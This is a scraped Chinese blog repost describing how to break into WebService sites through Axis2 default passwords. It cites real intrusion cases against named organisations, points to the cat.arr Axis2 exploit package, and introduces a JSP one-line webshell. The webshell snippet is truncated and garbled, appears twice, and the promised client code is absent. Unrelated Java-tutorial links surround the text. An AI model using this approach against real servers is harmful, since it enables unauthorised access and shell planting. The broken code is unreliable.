zoukankan      html  css  js  c++  java
  • 利用Axis2默认口令安全漏洞可入侵WebService网站

    利用Axis2默认口令安全漏洞可入侵WebService网站

    近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。

    乌云Axis2默认口令安全弱点利用案例:

    航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全目测已被其他人渗透过)

    乐信通某服务器axis2服务存在弱口令可上传webshell(root权限)

    中国科学院网Web-services(axis2)系统任意代码执行

    工具准备:

    Axis2利用工具包: cat.arr

    cat.arr工具说明与下载参见大牛“PHP to Java”的博客http://javaweb.org/?p=1548

    JSP一句话木马

    服务器端一句话木马代码:

    <%if(request.getparameter(“f”)!=null)(new>

    <%if(request.getparameter(“f”)!=null)(new>

    客户端提交代码:

  • 相关阅读:
    java学习--基础知识进阶第十一天--笔记
    java学习--基础知识进阶第十天--笔记
    java学习--基础知识进阶第十天--标准输入流 & 转换流 & 打印流、对象操作流 、Properties集合
    java学习--基础知识进阶第九天--笔记
    java学习--基础知识进阶第九天-- File类、字符流与字节流
    java学习--基础知识进阶第八天--笔记
    java学习--基础知识进阶第八天--异常体系&异常处理、Throwable常用方法&自定义异常、递归
    java学习--基础知识进阶第七天--笔记
    java学习--基础知识进阶第七天--HashSet集合、HashMap集合(集合遍历)
    java学习--基础知识进阶第六天--笔记
  • 原文地址:https://www.cnblogs.com/firstdream/p/5952921.html
Copyright © 2011-2022 走看看